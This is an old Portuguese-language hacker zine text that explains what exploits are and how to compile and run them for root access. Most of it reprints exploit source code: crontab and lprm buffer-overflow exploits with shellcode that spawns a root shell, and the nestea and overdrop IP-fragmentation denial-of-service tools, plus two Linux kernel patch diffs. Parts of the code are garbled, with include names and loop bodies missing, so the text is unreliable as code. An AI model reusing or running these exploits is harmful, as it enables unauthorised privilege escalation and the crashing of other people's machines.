<><><><><><><><><><><><><> 1*********** Xploit[]'s ***********1 1-INTRODU€AO : Recentemente h  uma grande d£vida ainda sobre os taos falados exploits. Muita gente ainda nao sabe direito o que sao, o que fazem, como usar, porque sao tao procurados. Entao nesse texto vamos tentar tirar essas duvidas. 2-O que ‚ um exploit : Simplificando a explica‡ao, um exploit ‚ um programa que "explora" um bug em um software especifico. Todos os exploits sao diferentes, eles fazem coisas diferentes e exploram bugs diferentes nos sistemas. Por isso um exploit ‚ sempre um programa especifico. Foram feitos pra te dar acesso root em diferentes sistemas. Eles conseguem isso explorando um bug em um software quando ele esta rodando como root. 3-Como eu uso um exploit : Desde que os exploits sao escritos em C em 99% das vezes, vocˆ vai precisar de uma shell na box em que voce for usar o exploit, ou, vocˆ precisa estar usando o mesmo sistema operacional da box que vocˆ est  tentando hackear. Entao, basicamente vocˆ precisa colocar o codigo do source ou o binario no diret¢rio acconts da sua shell. Para colocar isso na sua shell voce pode entrar via ftp e fazer upload dos desse jeito ou voce pode usar rz se vocˆ tiver usando uma shell dialup. J  que voce tem agora o exploit na box voce s¢ precisa compilar! Normalmente se compila o exploit como isso : blah:~/$gcc exploit.c Isso deve compilar seu exploit. De qualquer forma fique atento porque tem alguns exploits que sao sacanagens, pra pegar gente que nao manja de C. Depois de compilar o exploit est  pronto. Rode o exploit que seu trabalho ser  feito! 3-Onde posso pegar exploits. Dois sites bem legais são esses : http://get.your.exploits.com http://www.rootshell.com Bom, acho que j  falei o b sico dos exploits. Pelo menos voces j  tem uma no‡aozinha do que sao e o que fazem essas maravilhas. Espero que tenhamos esclarecido algumas duvidas. Agora mais exploit[]'Z Exploit do overflow no LINUX BY Dave G. -------------------------------Corta /* * * Dave G. * * http://www.escape.com/~daveg * * */ #include #include #include #include #include #define DEFAULT_OFFSET -1240 #define BUFFER_SIZE 100 /* MAX_TEMPSTR is 100 */ #define HAPPY_FILE "./Window" long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char **argv) { int fd; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; /* * The sscanf line reads for 'name' as %[^ =]. Neither a space, nor * a '=' character appears below */ int i; int ofs = DEFAULT_OFFSET; /* if we have a argument, use it as offset, else use default */ if(argc == 2) ofs = atoi(argv[1]); else if (argc > 2) { fprintf(stderr, "egg [offset]\n"); exit(-1); } /* print the offset in use */ printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (878/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr++ = '='; *ptr++ = 'X'; *ptr++ = '\n'; *ptr = 0; printf("Writing to %s\n", HAPPY_FILE); fd = open(HAPPY_FILE, O_WRONLY|O_CREAT, 0666); write (fd, buff, strlen(buff)); close(fd); execl("/usr/bin/crontab","crontab",HAPPY_FILE,NULL); /* Successful completion */ exit(0); } -----------------------------------Corta ------------------------------------------------------------------------------ Outro cl ssico overflow em Linux 4.2 BY Chris Evans -------------------------------------Corta /* lprm.c * * * * Exploit bug descoberto por Chris Evans no Linux lprm. */ #include #define PRINTER "-Pwhatever" static inline getesp() { __asm__(" movl %esp,%eax "); } main(int argc, char **argv) { int i,j,buffer,offset; long unsigned esp; char unsigned buf[4096]; unsigned char shellcode[]="\x89\xe1\x31\xc0\x50\x8d\x5c\x24\xf9\x83\xc4\x0c" "\x50\x53\x89\xca\xb0\x0b\xcd\x80/bin/sh"; buffer=990; offset=3000; if (argc>1)buffer=atoi(argv[1]); if (argc>2)offset=atoi(argv[2]); for (i=0;i> 8) & 0xFF; buf[i+2]=(esp >> 16) & 0xFF; buf[i+3]=(esp >> 24) & 0xFF; buf[i+4]=esp & 0xFF; buf[i+5]=(esp >> 8) & 0xFF; buf[i+6]=(esp >> 16) & 0xFF; buf[i+7]=(esp >> 24) & 0xFF; printf("Offset: 0x%x\n\n",esp); execl("/usr/bin/lprm","lprm",PRINTER,buf,NULL); } ----------------------------------------------------Corta ------------------------------------------------------------------------------ Bug do IP em Linux 2.0.33 BY Alan Cox -------------------------------------------------Corta Date: Thu, 16 Apr 1998 15:09:56 +0100 Reply-To: Alan Cox Subject: Linux 2.0.33 vulnerability: fragment patterns Ok duplicated. There's an 'off by one IP header' bug --- ip_fragment.c.old Thu Apr 16 12:25:34 1998 +++ ip_fragment.c Thu Apr 16 12:29:02 1998 @@ -375,7 +375,7 @@ fp = qp->fragments; while(fp != NULL) { - if (fp->len < 0 || count+fp->len > skb->len) + if (fp->len < 0 || fp->offset+qp->ihlen+fp->len > skb->len) { NETDEBUG(printk("Invalid fragment list: Fragment over size.\n")); ip_free(qp); ------------------------------------------------------------------ // // // // nestea.c by humble of rhino9 4/16/98 // This exploits the "off by one ip header" bug in the linux ip frag code. // Crashes linux 2.0.* and 2.1.* and some windows boxes // this code is a total rip of teardrop - it's messy // hi sygma #include #include #include #include #include #include #include #include #include #include #include // bsd usage is currently broken because of socket options on the third sendto #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define MAGIC2 108 #define PADDING 256 /* datagram frame padding for first packet */ #define COUNT 500 /* we are overwriting a small number of bytes we shouldnt have access to in the kernel. to be safe, we should hit them till they die :> */ void usage(u_char *); u_long name_resolve(u_char *); u_short in_cksum(u_short *, int); void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv) { int one = 1, count = 0, i, rip_sock; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; struct in_addr addr; if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("raw socket"); exit(1); } if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc < 3) usage(argv[0]); if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } while ((i = getopt(argc, argv, "s:t:n:")) != EOF) { switch (i) { case 's': /* source port (should be emphemeral) */ src_prt = (u_short)atoi(optarg); break; case 't': /* dest port (DNS, anyone?) */ dst_prt = (u_short)atoi(optarg); break; case 'n': /* number to send */ count = atoi(optarg); break; default : usage(argv[0]); break; /* NOTREACHED */ } } srandom((unsigned)(time((time_t)0))); if (!src_prt) src_prt = (random() % 0xffff); if (!dst_prt) dst_prt = (random() % 0xffff); if (!count) count = COUNT; fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n"); fprintf(stderr, "Death on flaxen wings (yet again):\n"); addr.s_addr = src_ip; fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); addr.s_addr = dst_ip; fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); fprintf(stderr, " Amt: %5d\n", count); fprintf(stderr, "[ "); for (i = 0; i < count; i++) { send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); fprintf(stderr, "b00m "); usleep(500); } fprintf(stderr, "]\n"); return (0); } void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt) { int i; u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ u_char byte; /* a byte */ struct sockaddr_in sin; /* socket protocol structure */ sin.sin_family = AF_INET; sin.sin_port = src_prt; sin.sin_addr.s_addr = dst_ip; packet = (u_char *)malloc(IPH + UDPH + PADDING+40); p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40); byte = 0x4F; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 44; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ for(i=0;ih_addr, (char *)&addr.s_addr, host_ent->h_length); } return (addr.s_addr); } void usage(u_char *name) { fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n", name); exit(0); } -----------------------------------------------Corta ------------------------------------------------------------------------------ Ovedrop em Linux 2.0.33 BY Michal Zalewski ----------------------------------------------------------Corta From lcamtuf@boss.staszic.waw.pl Sat Apr 18 09:06:58 1998 Date: Sat, 18 Apr 1998 11:48:33 +0200 (CEST) From: Michal Zalewski Subject: ip_fragment.c - printk() problem. Here's a DoS exploit against Linux 2.0.33... It doesn't crash anything, but it's very annoying ;) Fix: --- ip_fragment.c.orig Fri Apr 17 16:42:38 1998 +++ ip_fragment.c Fri Apr 17 17:17:15 1998 @@ -345,7 +345,7 @@ if(len>65535) { - printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)); + NETDEBUG(printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr))); ip_statistics.IpReasmFails++; ip_free(qp); return NULL; ------------------------------------------------------------------------- // // overdrop by lcamtuf [Linux 2.0.33 printk abuse] // ------------------------------------------------ // based on (reaped from) teardrop by route|daemon9 #include #include #include #include #include #include #include #include #include #include #include #define IP_MF 0x2000 #define IPH 0x14 #define UDPH 0x8 #define PADDING 0x1c #define MAGIC 0x3 #define COUNT 0xBEEF #define FRAG2 0xFFFF void usage(char *name) { fprintf(stderr,"%s dst_ip [ -n how_many ] [ -s src_ip ] [ -x ] (use -x for express delivery).\n",name); exit(0); } u_long name_resolve(char *host_name) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr=inet_addr(host_name))==-1) { if (!(host_ent=gethostbyname(host_name))) return (0); bcopy(host_ent->h_addr,(char *)&addr.s_addr,host_ent->h_length); } return (addr.s_addr); } void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt) { u_char *packet=NULL,*p_ptr=NULL; u_char byte; struct sockaddr_in sin; sin.sin_family=AF_INET; sin.sin_port=src_prt; sin.sin_addr.s_addr=dst_ip; packet=(u_char *)malloc(IPH+UDPH+PADDING); p_ptr=packet; bzero((u_char *)p_ptr,IPH+UDPH+PADDING); byte=0x45; memcpy(p_ptr,&byte,sizeof(u_char)); p_ptr+=2; *((u_short *)p_ptr)=htons(IPH+UDPH+PADDING); p_ptr+=2; *((u_short *)p_ptr)=htons(242); p_ptr+=2; *((u_short *)p_ptr)|=htons(IP_MF); p_ptr+=2; *((u_short *)p_ptr)=0x40; byte=IPPROTO_UDP; memcpy(p_ptr+1,&byte,sizeof(u_char)); p_ptr+=4; *((u_long *)p_ptr)=src_ip; p_ptr+=4; *((u_long *)p_ptr)=dst_ip; p_ptr+=4; *((u_short *)p_ptr)=htons(src_prt); p_ptr+=2; *((u_short *)p_ptr)=htons(dst_prt); p_ptr+=2; *((u_short *)p_ptr)=htons(8+PADDING); if (sendto(sock,packet,IPH+UDPH+PADDING,0,(struct sockaddr *)&sin, sizeof(struct sockaddr))==-1) { perror("\nsendto"); free(packet); exit(1); } p_ptr=&packet[2]; *((u_short *)p_ptr)=htons(IPH+MAGIC+1); p_ptr+=4; *((u_short *)p_ptr)=htons(FRAG2); if (sendto(sock,packet,IPH+MAGIC+1,0,(struct sockaddr *)&sin, sizeof(struct sockaddr))==-1) { perror("\nsendto"); free(packet); exit(1); } free(packet); } int main(int argc, char **argv) { int one=1,count=0,i,rip_sock,lag=500; u_long src_ip=0,dst_ip=0; u_short src_prt=0,dst_prt=0; struct in_addr addr; fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n"); if((rip_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) { perror("raw socket"); exit(1); } if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) { perror("IP_HDRINCL"); exit(1); } if (argc < 2) usage(argv[0]); if (!(dst_ip=name_resolve(argv[1]))) { fprintf(stderr,"Can't resolve destination address.\n"); exit(1); } while ((i=getopt(argc,argv,"s:n:x"))!=EOF) { switch (i) { case 'n': count = atoi(optarg); break; case 's': if (!(src_ip=name_resolve(optarg))) { fprintf(stderr,"Can't resolve source address.\n"); exit(1); } break; case 'x': lag=0; break; default: usage(argv[0]); break; } } srandom((unsigned)(time((time_t)0))); if (!count) count=COUNT; fprintf(stderr,"Sending oversized packets:\nFrom: "); if (!src_ip) fprintf(stderr," (random)"); else { addr.s_addr = src_ip; fprintf(stderr,"%15s",inet_ntoa(addr)); } addr.s_addr = dst_ip; fprintf(stderr,"\n To: %15s\n",inet_ntoa(addr)); fprintf(stderr," Amt: %5d\n",count); fprintf(stderr,"[ "); for (i=0;i><><><><><><><><><><><><>